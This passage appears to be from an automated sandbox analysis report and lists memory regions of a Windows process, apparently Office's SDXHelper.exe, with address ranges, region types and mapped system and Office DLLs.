pagefile_backed name = "pagefile_0x0000003688a20000" filename = "" Region: id = 6681 start_va = 0x3688a40000 end_va = 0x3688b3ffff entry_point = 0x0 region_type = private name = "private_0x0000003688a40000" filename = "" Region: id = 6682 start_va = 0x3688b40000 end_va = 0x3688b43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688b40000" filename = "" Region: id = 6683 start_va = 0x3688b50000 end_va = 0x3688b50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688b50000" filename = "" Region: id = 6684 start_va = 0x3688b60000 end_va = 0x3688b61fff entry_point = 0x0 region_type = private name = "private_0x0000003688b60000" filename = "" Region: id = 6685 start_va = 0x7df5ff5e0000 end_va = 0x7ff5ff5dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5e0000" filename = "" Region: id = 6686 start_va = 0x7ff70e740000 end_va = 0x7ff70e762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff70e740000" filename = "" Region: id = 6687 start_va = 0x7ff70e769000 end_va = 0x7ff70e769fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e769000" filename = "" Region: id = 6688 start_va = 0x7ff70e76e000 end_va = 0x7ff70e76ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70e76e000" filename = "" Region: id = 6689 start_va = 0x7ff70e960000 end_va = 0x7ff70e97efff entry_point = 0x7ff70e960000 region_type = mapped_file name = "sdxhelper.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\SDXHelper.exe" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\sdxhelper.exe") Region: id = 6690 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6750 start_va = 0x3688a00000 end_va = 0x3688a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688a00000" filename = "" Region: id = 6751 start_va = 0x3688a10000 end_va = 0x3688a16fff entry_point = 0x0 region_type = private name = "private_0x0000003688a10000" filename = "" Region: id = 6752 start_va = 0x3688b70000 end_va = 0x3688c6ffff entry_point = 0x0 region_type = private name = "private_0x0000003688b70000" filename = "" Region: id = 6753 start_va = 0x3688c70000 end_va = 0x3688d2dfff entry_point = 0x3688c70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6754 start_va = 0x3688d30000 end_va = 0x3688e2ffff entry_point = 0x0 region_type = private name = "private_0x0000003688d30000" filename = "" Region: id = 6755 start_va = 0x3688e30000 end_va = 0x3688e30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688e30000" filename = "" Region: id = 6756 start_va = 0x3688e40000 end_va = 0x3688e46fff entry_point = 0x0 region_type = private name = "private_0x0000003688e40000" filename = "" Region: id = 6757 start_va = 0x3688e50000 end_va = 0x3688e50fff entry_point = 0x0 region_type = private name = "private_0x0000003688e50000" filename = "" Region: id = 6758 start_va = 0x3688e60000 end_va = 0x3688e60fff entry_point = 0x0 region_type = private name = "private_0x0000003688e60000" filename = "" Region: id = 6759 start_va = 0x3688ea0000 end_va = 0x3688eaffff entry_point = 0x0 region_type = private name = "private_0x0000003688ea0000" filename = "" Region: id = 6760 start_va = 0x3688eb0000 end_va = 0x3689037fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688eb0000" filename = "" Region: id = 6761 start_va = 0x3689040000 end_va = 0x36891c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003689040000" filename = "" Region: id = 6762 start_va = 0x36891d0000 end_va = 0x368a5cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000036891d0000" filename = "" Region: id = 6763 start_va = 0x7ff70e640000 end_va = 0x7ff70e73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff70e640000" filename = "" Region: id = 6764 start_va = 0x7ff70e76c000 end_va = 0x7ff70e76dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e76c000" filename = "" Region: id = 6765 start_va = 0x7ffc3eab0000 end_va = 0x7ffc3ed27fff entry_point = 0x7ffc3eab0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 6766 start_va = 0x7ffc410e0000 end_va = 0x7ffc41363fff entry_point = 0x7ffc410e0000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 6767 start_va = 0x7ffc4fd60000 end_va = 0x7ffc4fe06fff entry_point = 0x7ffc4fd60000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 6768 start_va = 0x7ffc50400000 end_va = 0x7ffc504f1fff entry_point = 0x7ffc50400000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 6769 start_va = 0x7ffc51490000 end_va = 0x7ffc514a5fff entry_point = 0x7ffc51490000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 6770 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6771 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6772 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6773 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6774 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6775 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6776 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6777 start_va = 0x7ffc55280000 end_va = 0x7ffc552b5fff entry_point = 0x7ffc55280000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6778 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6779 start_va = 0x7ffc55380000 end_va = 0x7ffc554dbfff entry_point = 0x7ffc55380000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6780 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6781 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6782 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6783 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6784 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6785 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6786 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6787 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6788 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6789 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6790 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6791 start_va = 0x368a5d0000 end_va = 0x368a906fff entry_point = 0x368a5d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6792 start_va = 0x7ffc17bd0000 end_va = 0x7ffc17bdffff entry_point = 0x0 region_type = private name = "private_0x00007ffc17bd0000" filename = "" Region: id = 6793 start_va = 0x3688e70000 end_va = 0x3688e70fff entry_point = 0x0 region_type = private name = "private_0x0000003688e70000" filename = "" Region: id = 6794 start_va = 0x3688e80000 end_va = 0x3688e80fff entry_point = 0x0 region_type = private name = "private_0x0000003688e80000" filename = "" Region: id = 6795 start_va = 0x7ffc54440000 end_va = 0x7ffc544d7fff entry_point = 0x7ffc54440000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 6796 start_va = 0x3688d30000 end_va = 0x3688d32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688d30000" filename = "" Region: id = 6797 start_va = 0x3688d40000 end_va = 0x3688d42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688d40000" filename = "" Region: id = 6798 start_va = 0x3688d50000 end_va = 0x3688d5ffff entry_point = 0x0 region_type = private name = "private_0x0000003688d50000" filename = "" Region: id = 6799 start_va = 0x3688e90000 end_va = 0x3688e91fff entry_point = 0x3688e90000 region_type = mapped_file name = "installermainshell.tlb" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\InstallerMainShell.tlb" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\installermainshell.tlb") Region: id = 6800 start_va = 0x7ffc3d620000 end_va = 0x7ffc3dc98fff entry_point = 0x7ffc3d620000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 6801 start_va = 0x7ffc3dca0000 end_va = 0x7ffc3e4b0fff entry_point = 0x7ffc3dca0000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 6802 start_va = 0x7ffc52d70000 end_va = 0x7ffc52e05fff entry_point = 0x7ffc52d70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6803 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6823 start_va = 0x3688d60000 end_va = 0x3688d6ffff entry_point = 0x0 region_type = private name = "private_0x0000003688d60000" filename = "" Region: id = 6824 start_va = 0x3688d70000 end_va = 0x3688d71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688d70000" filename = "" Region: id = 6825 start_va = 0x3688d80000 end_va = 0x3688d83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688d80000" filename = "" Region: id = 6826 start_va = 0x3688d90000 end_va = 0x3688d91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688d90000" filename = "" Region: id = 6827 start_va = 0x3688da0000 end_va = 0x3688da0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688da0000" filename = "" Region: id = 6828 start_va = 0x368a910000 end_va = 0x368aa0ffff entry_point = 0x0 region_type = private name = "private_0x000000368a910000" filename = "" Region: id = 6829 start_va = 0x368aaa0000 end_va = 0x368aabffff entry_point = 0x0 region_type = private name = "private_0x000000368aaa0000" filename = "" Region: id = 6830 start_va = 0x368aac0000 end_va = 0x368ace0fff entry_point = 0x368aac0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 6831 start_va = 0x368acf0000 end_va = 0x368adeffff entry_point = 0x0 region_type = private name = "private_0x000000368acf0000" filename = "" Region: id = 6832 start_va = 0x368adf0000 end_va = 0x368aeeffff entry_point = 0x0 region_type = private name = "private_0x000000368adf0000" filename = "" Region: id = 6833 start_va = 0x368aef0000 end_va = 0x368afa7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000368aef0000" filename = "" Region: id = 6834 start_va = 0x368afb0000 end_va = 0x368b0affff entry_point = 0x0 region_type = private name = "private_0x000000368afb0000" filename = "" Region: id = 6835 start_va = 0x368b0b0000 end_va = 0x368b1affff entry_point = 0x0 region_type = private name = "private_0x000000368b0b0000" filename = "" Region: id = 6836 start_va = 0x7ff70e765000 end_va = 0x7ff70e766fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e765000" filename = "" Region: id = 6837 start_va = 0x7ff70e767000 end_va = 0x7ff70e768fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e767000" filename = "" Region: id = 6838 start_va = 0x7ff70e76a000 end_va = 0x7ff70e76bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e76a000" filename = "" Region: id = 6839 start_va = 0x7ff70e76c000 end_va = 0x7ff70e76dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e76c000" filename = "" Region: id = 6840 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 6841 start_va = 0x7ffc4b930000 end_va = 0x7ffc4bc6cfff entry_point = 0x7ffc4b930000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 6842 start_va = 0x7ffc4cbd0000 end_va = 0x7ffc4ce43fff entry_point = 0x7ffc4cbd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6843 start_va = 0x7ffc525f0000 end_va = 0x7ffc52611fff entry_point = 0x7ffc525f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6844 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6850 start_va = 0x3688db0000 end_va = 0x3688db0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688db0000" filename = "" Region: id = 6851 start_va = 0x3688dc0000 end_va = 0x3688dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688dc0000" filename = "" Region: id = 6852 start_va = 0x368b1b0000 end_va = 0x368b2affff entry_point = 0x0 region_type = private name = "private_0x000000368b1b0000" filename = "" Region: id = 6853 start_va = 0x7ff70e763000 end_va = 0x7ff70e764fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e763000" filename = "" Region: id = 6854 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 6855 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6856 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6857 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6858 start_va = 0x368b2b0000 end_va = 0x368b3affff entry_point = 0x0 region_type = private name = "private_0x000000368b2b0000" filename = "" Region: id = 6859 start_va = 0x368b3b0000 end_va = 0x368b4affff entry_point = 0x0 region_type = private name = "private_0x000000368b3b0000" filename = "" Region: id = 6860 start_va = 0x368b4b0000 end_va = 0x368b5affff entry_point = 0x0 region_type = private name = "private_0x000000368b4b0000" filename = "" Region: id = 6861 start_va = 0x368b5b0000 end_va = 0x368b6affff entry_point = 0x0 region_type = private name = "private_0x000000368b5b0000" filename = "" Region: id = 6862 start_va = 0x7ff70e638000 end_va = 0x7ff70e639fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e638000" filename = "" Region: id = 6863 start_va = 0x7ff70e63a000 end_va = 0x7ff70e63bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e63a000" filename = "" Region: id = 6864 start_va = 0x7ff70e63c000 end_va = 0x7ff70e63dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70e63c000" filename = "" Region: id = 6865 start_va = 0x7ff70e63e000 end_va = 0x7ff70e63ffff entry_point = 0x0 region_type = private name = "private_0x00007ff70e63e000" filename = "" Region: id = 6866 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 6867 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6868 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6869 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6990 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6991 start_va = 0x7ffc57450000 end_va = 0x7ffc57456fff entry_point = 0x7ffc57450000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 6992 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6993 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6994 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 6995 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6996 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 6997 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 7012 start_va = 0x7ffc4b540000 end_va = 0x7ffc4b6d6fff entry_point = 0x7ffc4b540000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 7013 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4e145fff entry_point = 0x7ffc4ddd0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 7014 start_va = 0x3688dd0000 end_va = 0x3688dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003688dd0000" filename = "" Region: id = 7015 start_va = 0x7ffc4b290000 end_va = 0x7ffc4b536fff entry_point = 0x7ffc4b290000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 7049 start_va = 0x3688de0000 end_va = 0x3688de0fff entry_point = 0x3688de0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 7050 start_va = 0x368b6b0000 end_va = 0x368b7affff entry_point = 0x0 region_type = private name = "private_0x000000368b6b0000" filename = "" Region: id = 7051 start_va = 0x7ff70e636000 end_va = 0x7ff70e637fff entry_point = 0x0 region_type = private name = "private_0x00007ff70e636000" filename = "" Region: id = 7052 start_va = 0x7ffc3f710000 end_va = 0x7ffc3f7bcfff entry_point = 0x7ffc3f710000 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 7053 start_va = 0x7ffc50c00000 end_va = 0x7ffc50d30fff entry_point = 0x7ffc50c00000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 7054 start_va = 0x7ffc52f40000 end_va = 0x7ffc5302dfff entry_point = 0x7ffc52f40000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 7055 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7056 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7057 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 7058 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 7070 start_va = 0x3688df0000 end_va = 0x3688df4fff entry_point = 0x3688df0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 7071 start_va = 0x3688e00000 end_va = 0x3688e0ffff entry_point = 0x3688e00000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 7072 start_va = 0x3688e10000 end_va = 0x3688e12fff entry_point = 0x3688e10000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 7073 start_va = 0x368b7b0000 end_va = 0x368b9affff entry_point = 0x0 region_type = private name = "private_0x000000368b7b0000" filename = "" Region: id = 7074 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 7075 start_va = 0x7ffc4a6b0000 end_va = 0x7ffc4a6c6fff entry_point = 0x7ffc4a6b0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7076 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 7077 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: 